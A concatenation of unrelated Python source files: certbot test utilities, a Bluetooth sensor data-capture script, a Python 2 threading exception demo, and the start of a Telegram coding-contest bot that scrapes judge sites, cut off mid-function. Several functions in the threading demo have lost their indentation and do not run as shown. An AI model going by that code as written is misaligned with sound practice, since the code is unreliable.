        # Run the optional hook first (its return value is discarded),
        # then delegate the call to the underlying MagicMock.
        if self._func is not None:
            self._func(*args, **kwargs)
        return self._mock(*args, **kwargs)

    def __getattribute__(self, name):
        if name == '_frozen':
            try:
                return object.__getattribute__(self, name)
            except AttributeError:
                # Looked up during __init__ before _frozen is assigned.
                return False
        elif name in ('return_value', 'side_effect',):
            # Always proxied to the MagicMock, frozen or not.
            return getattr(object.__getattribute__(self, '_mock'), name)
        elif name == '_frozen_set' or name in self._frozen_set:
            # Names registered before freezing live on the instance itself.
            return object.__getattribute__(self, name)
        else:
            return getattr(object.__getattribute__(self, '_mock'), name)

    def __setattr__(self, name, value):
        """ Before it is frozen, attributes are set on the FreezableMock
        instance and added to the _frozen_set. Attributes in the _frozen_set
        cannot be changed after the FreezableMock is frozen. In this case,
        they are set on the underlying _mock.

        In cases of return_value and side_effect, these attributes are always
        passed through to the instance's _mock and added to the _frozen_set
        before the object is frozen.

        """
        if self._frozen:
            if name in self._frozen_set:
                raise AttributeError('Cannot change frozen attribute ' + name)
            else:
                return setattr(self._mock, name, value)
        if name != '_frozen_set':
            self._frozen_set.add(name)
        if name in ('return_value', 'side_effect'):
            return setattr(self._mock, name, value)
        else:
            return object.__setattr__(self, name, value)
def _create_get_utility_mock():
    """Build a frozen mock getUtility returning an argument-validating IDisplay."""
    display = FreezableMock()
    for name in interfaces.IDisplay.names():  # pylint: disable=no-member
        if name == 'notification':
            continue
        validated = FreezableMock(frozen=True, func=_assert_valid_call)
        setattr(display, name, validated)
    display.freeze()
    return FreezableMock(frozen=True, return_value=display)
def _create_get_utility_mock_with_stdout(stdout):
    """Build a frozen mock getUtility whose IDisplay echoes messages to *stdout*."""
    def _write_msg(message, *unused_args, **unused_kwargs):
        """Write to message to stdout.
        """
        if message:
            stdout.write(message)

    def mock_method(*args, **kwargs):
        """
        Mock function for IDisplay methods.
        """
        # NOTE: args/kwargs are passed positionally here, mirroring the
        # original call shape exactly.
        _assert_valid_call(args, kwargs)
        _write_msg(*args, **kwargs)

    display = FreezableMock()
    for name in interfaces.IDisplay.names():  # pylint: disable=no-member
        handler = _write_msg if name == 'notification' else mock_method
        setattr(display, name, FreezableMock(frozen=True, func=handler))
    display.freeze()
    return FreezableMock(frozen=True, return_value=display)
def _assert_valid_call(*args, **kwargs):
    """Check that an IDisplay method call used valid arguments."""
    message = args[0] if args else kwargs['message']
    assert_kwargs = {
        'default': kwargs.get('default', None),
        'cli_flag': kwargs.get('cli_flag', None),
        'force_interactive': kwargs.get('force_interactive', False),
    }
    display_util.assert_valid_call(message, **assert_kwargs)
class TempDirTestCase(unittest.TestCase):
    """Base test class which sets up and tears down a temporary directory"""
    def setUp(self):
        """Execute before test"""
        # Fresh temp dir per test; removed in tearDown.
        self.tempdir = tempfile.mkdtemp()
    def tearDown(self):
        """Execute after test"""
        # Cleanup opened resources after a test. This is usually done through atexit handlers in
        # Certbot, but during tests, atexit will not run registered functions before tearDown is
        # called and instead will run them right before the entire test process exits.
        # It is a problem on Windows, that does not accept to clean resources before closing them.
        logging.shutdown()
        util._release_locks()  # pylint: disable=protected-access

        def handle_rw_files(_, path, __):
            """Handle read-only files, that will fail to be removed on Windows."""
            # Make the file writable, then retry the removal.
            os.chmod(path, stat.S_IWRITE)
            os.remove(path)
        shutil.rmtree(self.tempdir, onerror=handle_rw_files)
class ConfigTestCase(TempDirTestCase):
    """Test class which sets up a NamespaceConfig object."""
    def setUp(self):
        super(ConfigTestCase, self).setUp()
        # Wrap the CLI defaults in a MagicMock namespace so unknown
        # attribute reads don't fail, then override test-relevant paths.
        self.config = configuration.NamespaceConfig(
            mock.MagicMock(**constants.CLI_DEFAULTS)
        )
        self.config.verb = "certonly"
        self.config.config_dir = os.path.join(self.tempdir, 'config')
        self.config.work_dir = os.path.join(self.tempdir, 'work')
        self.config.logs_dir = os.path.join(self.tempdir, 'logs')
        self.config.cert_path = constants.CLI_DEFAULTS['auth_cert_path']
        self.config.fullchain_path = constants.CLI_DEFAULTS['auth_chain_path']
        # NOTE(review): chain_path and fullchain_path both use
        # 'auth_chain_path' -- confirm this duplication is intentional.
        self.config.chain_path = constants.CLI_DEFAULTS['auth_chain_path']
        self.config.server = "https://example.com"
def lock_and_call(func, lock_path):
    """Grab a lock for lock_path and call func.

    A child process acquires the lock first (see hold_lock), so *func*
    runs while the lock is held by another process.

    :param callable func: object to call after acquiring the lock
    :param str lock_path: path to file or directory to lock

    """
    # Reload module to reset internal _LOCKS dictionary
    reload_module(util)

    # start child and wait for it to grab the lock
    cv = multiprocessing.Condition()
    cv.acquire()
    child_args = (cv, lock_path,)
    child = multiprocessing.Process(target=hold_lock, args=child_args)
    child.start()
    # Woken by the child's notify once it actually holds the lock.
    cv.wait()

    # call func and terminate the child
    func()
    # Tell the child to release its lock and exit, then reap it.
    cv.notify()
    cv.release()
    child.join()
    assert child.exitcode == 0
def hold_lock(cv, lock_path):  # pragma: no cover
    """Acquire a file lock at lock_path and wait to release it.

    Runs in a child process spawned by lock_and_call: takes the lock,
    notifies the parent, then blocks until the parent signals it to
    release and exit.

    :param multiprocessing.Condition cv: condition for synchronization
    :param str lock_path: path to the file lock

    """
    from certbot import lock
    # Directory vs file paths use different lock helpers.
    if os.path.isdir(lock_path):
        my_lock = lock.lock_dir(lock_path)
    else:
        my_lock = lock.LockFile(lock_path)
    cv.acquire()
    # Tell the parent the lock is held, then wait for permission to release.
    cv.notify()
    cv.wait()
    my_lock.release()
def skip_on_windows(reason):
    """Decorator to skip permanently a test on Windows. A reason is required."""
    def wrapper(function):
        """Wrapped version"""
        skip = unittest.skipIf(sys.platform == 'win32', reason)
        return skip(function)
    return wrapper
def broken_on_windows(function):
    """Decorator to skip temporarily a broken test on Windows."""
    reason = 'Test is broken and ignored on windows but should be fixed.'
    should_skip = (
        sys.platform == 'win32'
        and os.environ.get('SKIP_BROKEN_TESTS_ON_WINDOWS', 'true') == 'true')
    return unittest.skipIf(should_skip, reason)(function)
def temp_join(path):
    """Join *path* onto the platform's temp directory.

    Eg.: 'cert' => /tmp/cert (Linux) or
    'C:\\Users\\currentuser\\AppData\\Temp\\cert' (Windows).
    """
    base = tempfile.gettempdir()
    return os.path.join(base, path)
|
create_test_data_file_from_bt.py |
import serial
import time
import platform
import csv
import threading
import zephyr.protocol
import zephyr.message
def callback(x):
    """Echo every parsed message to stdout as it arrives."""
    print(x)
def reading_thread(protocol):
    """Pump bytes from *protocol* for roughly two minutes, then return."""
    deadline = time.time() + 120
    while time.time() < deadline:
        protocol.read_and_handle_byte()
def create_data_files(input_definitions):
    """Record a BT stream from each (serial_port, enable_channels) input.

    Spawns one reader thread per device writing to
    ../test_data/120-second-bt-stream-<index>. Every thread that was
    started is always joined, even if opening a later device fails.
    """
    threads = []
    try:
        for serial_i, (serial_port, enable_channels) in enumerate(input_definitions):
            payload_parser = zephyr.message.MessagePayloadParser([callback])
            port = serial.Serial(serial_port)
            log_path = "../test_data/120-second-bt-stream-%d" % serial_i
            protocol = zephyr.protocol.BioHarnessProtocol(
                port, payload_parser.handle_message, log_path)
            if enable_channels:
                protocol.enable_periodic_packets()
            reader = threading.Thread(target=reading_thread, args=(protocol,))
            threads.append(reader)
            reader.start()
    finally:
        for reader in threads:
            reader.join()
def main():
    """Record test data from the two configured serial inputs."""
    # (serial port index, enable periodic packets) per device.
    input_definitions = [(29, False), (30, True)]
    create_data_files(input_definitions)
# Run the capture only when invoked as a script (not on import).
if __name__ == "__main__":
    main()
|
concurren-futures.py | from concurrent.futures import ProcessPoolExecutor, ThreadPoolExecutor
import multiprocessing
from multiprocessing.pool import ThreadPool
import threading
import time
def bar(i=0):
    """Return i squared; raise ValueError for the default input of 0.

    Used as the worker whose exception the main_* demos try to observe.
    """
    if i != 0:
        return i ** 2
    raise ValueError("bar raise")
def main_Thread():
    """Demo: an exception raised inside a Thread never reaches the caller."""
    worker = threading.Thread(target=bar)
    worker.start()
    worker.join()
    raise RuntimeError("Exception not caught")
def main_ThreadPool():
p = ThreadPool(4)
for i in p.map(bar, xrange(4)):
print i
raise RuntimeError("Exception not caught")
def main_ThreadPoolExecutorMap():
with ThreadPoolExecutor(4) as ex:
for i in ex.map(bar, xrange(4)):
print i
raise RuntimeError("Exception not caught")
def main_ThreadPoolExecutorSubmit():
with ThreadPoolExecutor(4) as ex:
s = ex.submit(bar)
print s.result()
raise RuntimeError("Exception not caught")
def main_Process():
    """Demo: an exception inside a child Process never reaches the parent."""
    worker = multiprocessing.Process(target=bar)
    worker.start()
    worker.join()
    raise RuntimeError("Exception not caught")
def main_ProcessPool():
p = multiprocessing.Pool(4)
for i in p.map(bar, xrange(4)):
print i
raise RuntimeError("Exception not caught")
def main_ProcessPoolExecutorMap():
with ProcessPoolExecutor(4) as ex:
for i in ex.map(bar, xrange(4)):
print i
raise RuntimeError("Exception not caught")
def main_ProcessPoolExecutorSubmit():
with ProcessPoolExecutor(4) as ex:
s = ex.submit(bar, 0)
print s.result()
raise RuntimeError("Exception not caught")
def run(fun):
    """Invoke *fun* and report whether the worker's exception propagated.

    ValueError escaping means bar's exception reached the caller
    ([RAISED]); RuntimeError means fun ran to its end, i.e. the exception
    was swallowed ([NOT raised]). Also reports threads still alive a
    second later ("zombies").
    """
    ac = threading.active_count()
    try:
        fun()
    except RuntimeError:
        print fun.__name__, "[NOT raised]"
    except ValueError:
        print fun.__name__, "[RAISED]"
    # Give workers a moment to wind down before counting leftovers.
    time.sleep(1)
    print "Zombie thread:", threading.active_count() - ac
if __name__ == '__main__':
    # Exercise each concurrency primitive in turn and report, for every
    # one, whether the worker's ValueError propagated to the caller.
    run(main_Thread)
    run(main_ThreadPool)
    run(main_ThreadPoolExecutorMap)
    run(main_ThreadPoolExecutorSubmit)
    run(main_Process)
    run(main_ProcessPool)
    run(main_ProcessPoolExecutorMap)
    run(main_ProcessPoolExecutorSubmit)
|
app.py | import logging
import helper
import json
from datetime import datetime, timedelta
import os
import sys
from apscheduler.schedulers.background import BackgroundScheduler
from apscheduler.jobstores.sqlalchemy import SQLAlchemyJobStore
from telegram import InlineKeyboardButton, InlineKeyboardMarkup
from queue import Queue
from telegram import ReplyKeyboardRemove
from telegram import ReplyKeyboardMarkup
from threading import Thread
from telegram import ParseMode
from telegram import Bot
from telegram.ext import Dispatcher, CommandHandler, ConversationHandler, MessageHandler, RegexHandler, Updater,Filters,CallbackQueryHandler
from configparser import ConfigParser
import bs4 as bs
import html5lib
import time
import urllib.error
import urllib.request
from urllib import parse
import sqlite3
import random
from xlsxwriter.workbook import Workbook
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
                    level=logging.INFO)
logger = logging.getLogger(__name__)
# All secrets and endpoints come from config.ini (sections: telegram,
# hackerrank, clist, openshift).
config = ConfigParser()
config.read('config.ini')
TOKEN = config.get('telegram','bot_token')
HACKERRANK_API_KEY = config.get('hackerrank','api_key')
CLIST_USER_NAME = config.get('clist','username')
CLIST_API_KEY = config.get('clist','api_key')
mount_point=config.get('openshift','persistent_mount_point')
compiler = helper.HackerRankAPI(api_key=HACKERRANK_API_KEY)
# Comma-separated admin chat ids from the config.
adminlist=str(config.get('telegram','admin_chat_id')).split(',')
# FOR CONVERSATION HANDLERS
# One integer constant per conversation state (0..31).
NAME,JUDGE,HANDLE,SELECTION,HOLO,SOLO,POLO,XOLO,REMOVER,UPDA,QSELCC,LANG,CODE,DECODE,TESTCASES,RESULT,OTHER,FILE,FILETEST,GFG1,GFG2,GFG3,DB,CF,SCHED,REMNOTI,QSELCF,SUBSEL,SUBCC,SUBCF,UNSUB,MSG=range(32)
# CLASS FOR FLOOD PROTECTION
class Spam_settings:
    """Per-chat flood protection with escalating timeouts.

    Tracks recent message timestamps per chat and, when a rate limit is
    exceeded, imposes a timeout that multiplies on each repeat offence.
    """
    def __init__(self):
        self.limits = {1: 3, 5: 7, 10: 10, 15: 13, 30: 20} # max: 3 updates in 1 second, 7 updates in 5 seconds etc
        # First timeout length (seconds) and the multiplier applied to a
        # chat's timeout on each subsequent violation.
        self.timeout_start = 10
        self.timeout_factor = 5
        self.factors = {}   # chat_id -> current escalation multiplier
        self.timeouts = {}  # chat_id -> absolute time until which chat is muted
        self.times = {}     # chat_id -> recent message timestamps, newest first
    def new_message(self, chat_id):
        # Returns 0 when the message is allowed, a number of remaining
        # timeout seconds when already muted, or a warning text when this
        # message triggers a new timeout.
        update_time = time.time()
        if chat_id not in self.timeouts:
            self.timeouts.update({chat_id: 0})
            self.times.update({chat_id: [update_time]})
            self.factors.update({chat_id: 1})
        else:
            if self.timeouts[chat_id] > update_time:
                return self.timeouts[chat_id] - update_time
            for limit in self.limits:
                amount = 1
                for n, upd_time in enumerate(self.times[chat_id]):
                    if update_time - upd_time < limit:
                        amount += 1
                    else:
                        # NOTE(review): the threshold is only checked when a
                        # timestamp older than the window is seen; if every
                        # stored timestamp is inside the window the limit is
                        # never enforced for it -- confirm this is intended.
                        if amount > self.limits[limit]:
                            self.timeouts[chat_id] = update_time + self.timeout_start * (self.factors[chat_id])
                            self.factors[chat_id] *= self.timeout_factor
                            text = "You are timeouted by the flood protection system of this bot. Try again in {0} seconds.".format(
                                self.timeouts[chat_id] - update_time)
                            return text
            # Record this (allowed) message, newest first.
            self.times[chat_id].insert(0, update_time)
        return 0
    def wrapper(self, func): # only works on functions, not on instancemethods
        # Decorator: runs flood control before dispatching to the handler.
        def func_wrapper(bot, update, *args2):
            timeout = self.new_message(update.effective_chat.id)
            if not timeout:
                return func(bot, update, *args2)
            elif isinstance(timeout, str):
                print("timeout")
                # Only works for messages (+Commands) and callback_queries (Inline Buttons)
                if update.callback_query:
                    bot.edit_message_text(chat_id=update.effective_chat.id,
                                          message_id=update.effective_message.message_id,
                                          text=timeout)
                elif update.message:
                    bot.send_message(chat_id=update.effective_chat.id, text=timeout)
        return func_wrapper
# Module-wide flood-protection instance used by every handler's decorator.
timeouts = Spam_settings()
# CONNECTING TO SQLITE DATABASE AND CREATING TABLES
conn = sqlite3.connect(mount_point+'coders1.db')
create_table_request_list = [
    'CREATE TABLE handles(id TEXT PRIMARY KEY,name TEXT,HE TEXT,HR TEXT,CF TEXT,SP TEXT,CC TEXT)',
    'CREATE TABLE datas(id TEXT PRIMARY KEY,name TEXT,HE TEXT,HR TEXT,CF TEXT,SP TEXT,CC TEXT)',
    'CREATE TABLE priority(id TEXT PRIMARY KEY,HE TEXT,HR TEXT,CF TEXT,CC TEXT)',
    'CREATE TABLE subscribers(id TEXT PRIMARY KEY,CC int DEFAULT 0,CF int DEFAULT 0,CCSEL TEXT,CFSEL TEXT)',
]
for create_table_request in create_table_request_list:
    try:
        conn.execute(create_table_request)
    except:
        # Table already exists (or another sqlite error): keep going.
        pass
conn.commit()
conn.close()
# Warm the codeforces question cache from disk if a previous run saved it.
if os.path.exists(mount_point+'codeforces.json'):
    with open(mount_point+'codeforces.json', 'r') as codeforces:
        qcf = json.load(codeforces)
# GETTING QUESTIONS FROM CODECHEF WEBSITE
# STORING THEM ACCORDING TO THE TAG EASY,MEDIUM,HARD,BEGINNER,CHALLENGE
# STORING TITLE OF QUESTIONS AND THEIR CODE IN SEPERATE LISTS
i = 0
while (True):
    # TRYING 5 TIMES AS SOMETIMES IT GIVES URL ERROR IN ONE GO
    if i == 5:
        break
    try:
        # One request per difficulty page; a browser User-Agent avoids
        # being rejected as a script.
        reqcce = urllib.request.Request("https://www.codechef.com/problems/easy/", headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"})
        reqccs = urllib.request.Request("https://www.codechef.com/problems/school/", headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"})
        reqccm = urllib.request.Request("https://www.codechef.com/problems/medium/", headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"})
        reqcch = urllib.request.Request("https://www.codechef.com/problems/hard/", headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"})
        reqccc = urllib.request.Request("https://www.codechef.com/problems/challenge/", headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"})
        # For each page: problem titles (s*) and their submit links (s1*),
        # which carry the problem codes.
        concce = urllib.request.urlopen(reqcce)
        soupcce = bs.BeautifulSoup(concce, "html5lib")
        scce = soupcce.find_all('div', {"class": "problemname"})
        s1cce = soupcce.find_all('a', {"title": "Submit a solution to this problem."})
        conccs = urllib.request.urlopen(reqccs)
        soupccs = bs.BeautifulSoup(conccs, "html5lib")
        sccs = soupccs.find_all('div', {"class": "problemname"})
        s1ccs = soupccs.find_all('a', {"title": "Submit a solution to this problem."})
        conccm = urllib.request.urlopen(reqccm)
        soupccm = bs.BeautifulSoup(conccm, "html5lib")
        sccm = soupccm.find_all('div', {"class": "problemname"})
        s1ccm = soupccm.find_all('a', {"title": "Submit a solution to this problem."})
        concch = urllib.request.urlopen(reqcch)
        soupcch = bs.BeautifulSoup(concch, "html5lib")
        scch = soupcch.find_all('div', {"class": "problemname"})
        s1cch = soupcch.find_all('a', {"title": "Submit a solution to this problem."})
        conccc = urllib.request.urlopen(reqccc)
        soupccc = bs.BeautifulSoup(conccc, "html5lib")
        sccc = soupccc.find_all('div', {"class": "problemname"})
        s1ccc = soupccc.find_all('a', {"title": "Submit a solution to this problem."})
        break
    except urllib.error.URLError:
        i = i + 1
        continue
# COMMAND HANDLER FUNCTION FOR /start COMMAND
@timeouts.wrapper
def start(bot, update):
    """Reply to /start with the welcome text listing every bot command."""
    update.message.reply_text(
        'welcome!\nOnly one person can register through one telegram id\nHere are the commands\nEnter /cancel at any time to cancel operation\nEnter /randomcc to get a random question from codechef\nEnter /randomcf to get a random question from codeforces\nEnter /geeksforgeeks to get topics from geeks for geeks\nEnter /register to go to register menu to register your handle to the bot\nEnter /unregister to go to unregister menu to unregister from the bot\nEnter /ranklist to go to ranklist menu to get ranklist\nEnter /ongoing to get a list of ongoing competitions\nEnter /upcoming to get a list of upcoming competitions\nEnter /compiler to compile and run\nEnter /subscribe to get question of the day everyday\nEnter /unsubscribe to unsubscribe from question of the day\nEnter /update to initialise updating of your info\n Automatic updation of all data will take place every day\n To see all the commands enter /help any time.\n\nORIGINAL CREATOR @gotham13121997\nORIGINAL source code https://github.com/Gotham13121997/superCodingBot')
# COMMAND HANDLER FUNCTION FOR /help COMMAND
@timeouts.wrapper
def help(bot, update):
    """Handle /help: repeat the full command reference for the user."""
    help_text = 'Only one person can register through one telegram id\nHere are the commands\nEnter /register to go to register menu to register your handle to the bot\nEnter /cancel at any time to cancel operation\nEnter /randomcc to get a random question from codechef\nEnter /randomcf to get a random question from codeforces\nEnter /geeksforgeeks to get topics from geeks for geeks\nEnter /unregister to go to unregister menu to unregister from the bot\nEnter /ranklist to go to ranklist menu to get ranklist\nEnter /ongoing to get a list of ongoing competitions\nEnter /upcoming to get a list of upcoming competitions\nEnter /compiler to compile and run\nEnter /subscribe to get question of the day everyday\nEnter /unsubscribe to unsubscribe from question of the day\nEnter /update to initialise updating of your info\n Automatic updation of all data will take place every day\n To see all the commands enter /help any time.\n\nORIGINAL CREATOR @gotham13121997\nORIGINAL source code https://github.com/Gotham13121997/superCodingBot'
    update.message.reply_text(help_text)
# FUNCTION FOR LOGGING ALL KINDS OF ERRORS
def error(bot, update, error):
    """Log every update that triggered a dispatcher error."""
    message = 'Update "%s" caused error "%s"' % (update, error)
    logger.warning(message)
# START OF CONVERSATION HANDLER FOR GETTING RANDOM QUESTION FROM CODEFORCES
# FUNCTION TO GET INPUT ABOUT THE TYPE OF QUESTION FROM USER
@timeouts.wrapper
def randomcf(bot, update):
    """Ask which codeforces problem class (A-F or OTHERS) the user wants."""
    # callback data is the label plus the 'cf1' marker consumed by qselcf
    rows = [
        [InlineKeyboardButton(label, callback_data=label + 'cf1') for label in ('A', 'B', 'C')],
        [InlineKeyboardButton(label, callback_data=label + 'cf1') for label in ('D', 'E', 'F')],
        [InlineKeyboardButton("OTHERS", callback_data='OTHERScf1')],
    ]
    update.message.reply_text('Please select the type of question',
                              reply_markup=InlineKeyboardMarkup(rows))
    return QSELCF
# FUNCTION FOR SENDING THE RANDOM QUESTION TO USER ACCORDING TO HIS CHOICE
def qselcf(bot, update):
    """Send a random codeforces problem for the class the user picked.

    The callback data is the class letter plus a 'cf1' marker; the letter
    indexes the module-level qcf dict of problem lists.
    Returns ConversationHandler.END in all cases.
    """
    query = update.callback_query
    # FIX: the original elif chain left `strn` unbound (NameError) for any
    # callback data outside A-F/OTHERS; guard with a dict-key lookup instead.
    key = str(query.data).replace("cf1", "")
    if key not in qcf:
        return ConversationHandler.END
    bucket = qcf[key]
    strn = bucket[random.randint(0, len(bucket) - 1)]
    bot.edit_message_text(
        text="Random " + key + " question from codeforces\n\n" + strn,
        chat_id=query.message.chat_id,
        message_id=query.message.message_id)
    return ConversationHandler.END
# END OF CONVERSATION HANDLER FOR GETTING RANDOM QUESTION FROM CODEFORCES
# START OF CONVERSATION HANDLER FOR GETTING RANDOM QUESTION FROM CODECHEF
# FUNCTION TO GET INPUT ABOUT THE TYPE OF QUESTION FROM USER
@timeouts.wrapper
def randomcc(bot, update):
    """Ask which codechef difficulty class the user wants a problem from."""
    # callback data is the upper-cased label plus the 'cc1' marker read by qselcc
    layout = [["Beginner", "Easy"], ["Medium", "Hard"], ["Challenge"]]
    rows = [[InlineKeyboardButton(label, callback_data=label.upper() + 'cc1') for label in row]
            for row in layout]
    update.message.reply_text('Please select the type of question',
                              reply_markup=InlineKeyboardMarkup(rows))
    return QSELCC
# FUNCTION FOR SENDING THE RANDOM QUESTION TO USER ACCORDING TO HIS CHOICE
def qselcc(bot, update):
    """Send a random codechef problem for the difficulty the user picked.

    Picks from the pre-scraped module-level lists (problem-name divs and
    submit-link anchors) that were fetched from codechef at startup.
    Returns ConversationHandler.END in all cases.
    """
    query = update.callback_query
    val = query.data
    # map callback data to the (titles, submit-links) list pair scraped earlier
    pools = {
        'BEGINNERcc1': (sccs, s1ccs),
        'EASYcc1': (scce, s1cce),
        'MEDIUMcc1': (sccm, s1ccm),
        'HARDcc1': (scch, s1cch),
        'CHALLENGEcc1': (sccc, s1ccc),
    }
    # FIX: the original independent `if`s left strt/strn unbound (NameError)
    # for unknown callback data; bail out early instead.
    if val not in pools:
        return ConversationHandler.END
    titles, links = pools[val]
    n = random.randint(0, len(titles) - 1)
    strt = titles[n].text.strip("\n\n ")
    strn = links[n].text
    val = str(val).replace("cc1", "")
    bot.edit_message_text(
        text="Random " + val + " question from codechef\n\n" + strt + "\n" + "https://www.codechef.com/problems/" + strn,
        chat_id=query.message.chat_id,
        message_id=query.message.message_id)
    return ConversationHandler.END
# END OF CONVERSATION HANDLER FOR GETTING RANDOM QUESTION FROM CODECHEF
# START OF CONVERSATION HANDLER FOR REGISTERING THE USERS HANDLES
@timeouts.wrapper
def register(bot, update):
    """Begin the registration conversation by asking for the user's name."""
    update.message.reply_text('Hi,please enter your name ', reply_markup=ReplyKeyboardRemove())
    return NAME
# FUNCTION FOR GETTING THE NAME AND ASKING ABOUT WHICH JUDGE USER WANTS TO REGISTER THEIR HANDLE FOR
def name(bot, update, user_data):
    """Store the user's name and ask which online judge to register for."""
    user_data['name'] = update.message.text.upper()
    # THIS IS HOW AN INLINE KEYBOARD IS MADE AND USED
    judges = (("Hackerearth", 'HEreg1'), ("Hackerrank", 'HRreg1'),
              ("Codechef", 'CCreg1'), ("Spoj", 'SPreg1'),
              ("Codeforces", 'CFreg1'))
    rows = [[InlineKeyboardButton(label, callback_data=data) for label, data in judges[k:k + 2]]
            for k in range(0, len(judges), 2)]
    update.message.reply_text('please enter the online judge you want to setup with the bot',
                              reply_markup=InlineKeyboardMarkup(rows))
    return JUDGE
# FUNCTION FOR GETTING THE ONLINE JUDGE AND ASKING FOR HANDLE
def judge(bot, update, user_data):
    """Record the chosen judge code ('HE'/'HR'/'CF'/'CC'/'SP') and ask for the handle."""
    # AND THIS IS HOW WE GET THE CALLBACK DATA WHEN INLINE KEYBOARD KEY IS PRESSED
    query = update.callback_query
    valid = {'HEreg1', 'HRreg1', 'CFreg1', 'CCreg1', 'SPreg1'}
    if query.data not in valid:
        return ConversationHandler.END
    user_data['code'] = str(query.data).replace("reg1", "")
    bot.edit_message_text(text='please enter your handle eg. gotham13121997',
                          chat_id=query.message.chat_id,
                          message_id=query.message.message_id)
    return HANDLE
# FUNCTION FOR GETTING THE HANDLE AND REGISTERING IT IN DATABASE
# ALL THE MAGIC BEGINS HERE
def handle(bot, update, user_data):
    """Final step of the /register conversation.

    Scrapes the profile page of the judge chosen earlier
    (user_data['code'] is one of 'HE', 'HR', 'CC', 'SP', 'CF'), stores the
    scraped stats text and the handle in the sqlite database, extracts a
    numeric rating into the priority table (best effort), regenerates the
    cached ranklist spreadsheets, and confirms registration to the user.
    Replies 'wrong id' and ends the conversation if the profile page cannot
    be fetched or parsed.
    """
    user = str(update.message.from_user.id)
    handle1 = update.message.text
    name1 = user_data['name']
    code1 = user_data['code']
    if code1 == 'HE':
        # IF HACKEREARTH
        opener = urllib.request.build_opener()
        # SCRAPING DATA FROM WEBPAGE
        opener.addheaders = [('User-agent', 'Mozilla/5.0')]
        try:
            sauce = opener.open('https://www.hackerearth.com/@' + handle1)
            print('used')
            soup = bs.BeautifulSoup(sauce, 'html5lib')
            stri = "HACKEREARTH\n"
            # rating, follower and following counts are the anchor texts of
            # these three profile links
            for i in soup.find_all('a', {"href": "/users/" + handle1 + "/activity/hackerearth/#user-rating-graph"}):
                stri = stri + i.text + "\n"
            for i in soup.find_all('a', {"href": "/@" + handle1 + "/followers/"}):
                stri = stri + i.text + "\n"
            for i in soup.find_all('a', {"href": "/@" + handle1 + "/following/"}):
                stri = stri + i.text + "\n"
            vals = stri
        except urllib.error.URLError as e:
            # IF URL NOT FOUND THE ID IS WRONG
            update.message.reply_text('wrong id')
            user_data.clear()
            return ConversationHandler.END
    elif code1 == 'HR':
        # IF HACKERRANK
        opener = urllib.request.build_opener()
        opener.addheaders = [('User-agent', 'Mozilla/5.0')]
        try:
            sauce = opener.open('https://www.hackerrank.com/' + handle1 + '?hr_r=1')
            soup = bs.BeautifulSoup(sauce, 'html5lib')
            try:
                # a missing initialData script means the profile does not exist
                soup.find('script', {"id": "initialData"}).text
            except AttributeError:
                update.message.reply_text('wrong id')
                user_data.clear()
                return ConversationHandler.END
            # I HAVE NO IDEA WHAT I HAVE DONE HERE
            # BUT IT SEEMS TO WORK
            # NOTE(review): slices 280 chars after the third "hacker_id"
            # occurrence and splits out 9 fields — fragile screen-scraping;
            # verify against the current hackerrank page format.
            s = soup.find('script', {"id": "initialData"}).text
            i = s.find("hacker_id", s.find("hacker_id", s.find("hacker_id") + 1) + 1)
            i = parse.unquote(s[i:i + 280]).replace(",", ">").replace(":", " ").replace("{", "").replace("}",
                                                                                                         "").replace(
                '"', "").split(">")
            s1 = "HACKERRANK\n"
            for j in range(1, 10):
                s1 = s1 + i[j] + "\n"
            vals = s1
        except urllib.error.URLError as e:
            update.message.reply_text('wrong id')
            user_data.clear()
            return ConversationHandler.END
    elif code1 == 'CC':
        # IF CODECHEF
        opener = urllib.request.build_opener()
        opener.addheaders = [('User-agent', 'Mozilla/5.0')]
        try:
            sauce = opener.open('https://www.codechef.com/users/' + handle1)
            soup = bs.BeautifulSoup(sauce, 'html5lib')
            try:
                # ratings link is only present on a real profile page
                soup.find('a', {"href": "http://www.codechef.com/ratings/all"}).text
            except AttributeError:
                update.message.reply_text('wrong id')
                user_data.clear()
                return ConversationHandler.END
            try:
                s1 = soup.find('span', {"class": "rating"}).text + "\n"
            except AttributeError:
                # profile without a star rating span
                s1 = ""
            s = "CODECHEF" + "\n" + s1 + "rating: " + soup.find('a', {
                "href": "http://www.codechef.com/ratings/all"}).text + "\n" + soup.find('div', {
                "class": "rating-ranks"}).text.replace(" ", "").replace("\n\n", "").strip('\n')
            vals = s
        except urllib.error.URLError as e:
            update.message.reply_text('wrong id')
            user_data.clear()
            return ConversationHandler.END
    elif code1 == 'SP':
        # IF SPOJ
        opener = urllib.request.build_opener()
        opener.addheaders = [('User-agent', 'Mozilla/5.0')]
        try:
            sauce = opener.open('http://www.spoj.com/users/' + handle1 + '/')
            soup = bs.BeautifulSoup(sauce, 'html5lib')
            try:
                soup.find('div', {"class": "col-md-3"}).text
            except AttributeError:
                update.message.reply_text('wrong id')
                user_data.clear()
                return ConversationHandler.END
            s = soup.find('div', {"class": "col-md-3"}).text.strip('\n\n').replace("\t", "").split('\n')
            s = s[3].strip().split(":")
            s = "SPOJ\n" + s[0] + "\n" + s[1].strip(" ") + "\n" + soup.find('dl', {
                "class": "dl-horizontal profile-info-data profile-info-data-stats"}).text.replace("\t", "").replace(
                "\xa0", "").strip('\n')
            vals = s
        except urllib.error.URLError as e:
            update.message.reply_text('wrong id')
            user_data.clear()
            return ConversationHandler.END
    elif code1 == 'CF':
        # IF CODEFORCES
        opener = urllib.request.build_opener()
        opener.addheaders = [('User-agent', 'Mozilla/5.0')]
        try:
            sauce = opener.open('http://codeforces.com/profile/' + handle1)
            soup = bs.BeautifulSoup(sauce, 'html5lib')
            try:
                soup.find('img', {"alt": "User\'\'s contribution into Codeforces community"}).text
            except AttributeError:
                update.message.reply_text('wrong id')
                user_data.clear()
